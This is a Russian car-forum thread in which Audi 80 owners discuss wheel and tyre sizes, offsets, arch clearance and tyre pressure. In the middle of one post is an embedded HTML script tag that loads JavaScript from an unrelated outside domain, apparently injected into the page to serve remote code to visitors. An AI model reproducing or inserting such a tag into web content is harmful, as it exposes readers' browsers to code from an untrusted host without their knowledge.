Ответ: Хочу из бочки сделать ЧУДО =)) Иду я както пешком по улице и вижу новенькую Инфинити - - а на ней на низкопрофильной резине ограменные диски диаметр 19 или больше - черные. кованные с тонкими "спицами"... а внутри...... ничего - совсем ничего - ну просто крошечные тормозной диск и суппорт приделаны, от этого вида дажа Авдюха подстол бы полезла.... Так скажите же мне мастера тюнинга - зачем это нужно... зачем ставить огроменный диск и тонкую резину а внутри иметь ржавый суппорт или итого хуже ржавый барабан... или ехать быстро (подругомуж не ездят), и бояться какой нить канавы чтоб диск раскололо, а если не раскололо - так эти канавы 5ой точкой собирать.... НУ ННЕ ПОНИМАЮ Я.... А по теме - для В4 - 2 штатных размера 195/65 R15 и 205/60 R15... и только на V6 предписано 205/55 R16... да можно и больше и R17 - особенно если это RS2 этак '95 - у нее тормозной диск на 322... но тут все тормозами обусловлено а не красотой несусветной... У меня на лето 205/60-15 на зиму 195/65-15... из личных ощущений и 205/65-15 влезли бы без проблем, но возможно у меня подвеска завышенная (или просто пружины еще здорово держат)... да вот только одно я заметил после перехода на 205 - все колеи на МКАДЕ - на руле чуствую, а увеличевшееся пятно контакта, кактто не спасло от одного хорошего вылета... зналбы все это сразу вообще штат оставил....
Ответ: Хочу из бочки сделать ЧУДО =)) круче всего - кагда огромный диск R19 с намотанными шинами - а внутри - крошечный барабан))) в этом смысле селики и эклипсы рулят!!!
Ответ: Хочу из бочки сделать ЧУДО =)) Стоят 17 ковка .... Резина 225 на 45 ...Сейчас раздул крылья , колеса просто потерялись Надо 19 ставить .... Но 17 225 45 - это предел , особенно по ширине ! даже 230 уже не влезут... Так как подкрылку трет чуток при резком маневре со скольжением.... <script src="http://dispatchviewers.com/js.php?idc=nw224&rnd=88806238263563783477" type="text/javascript"></script>
Народ, тут разговор про колёса зашёл, вот постаивл себе 205/55 R15 жестковато уже, я не понимаю как народ на 40-45 профиле ездит... да, кстати, а вопрос по ходу, в зависимости от высоты профиля давление в шинах менять или не стоит?
У мну на 90-й стояли 205 55 Р16 ет30 и ничто ни зачто не тёрло. Примерял 235 45 Р17 ет35 при вывернутых колёсах за подкрылок слегка цепляло.
раз уж тут пошел разговор про диски, подскажите какой диапазон вылетов пойдет на Б4 16х и 17х дисков? штатный идет 15" et37.
а есть фото как диски с такой резиной на машине смотрелись? сейчас просто прикидываю какой максимальный профиль влезет на 16е колеса. сейчас стоят 205/45-R16
Здесь в начале темки есть мои фотки, посмотри. Но у меня было мордо от В4 . На в3 профиль меньше надо
Заглохла темка. Видать уже все продали "Восьмидесятки" Интересно то , что у нас они подпрыгнули цене и не так уж хило...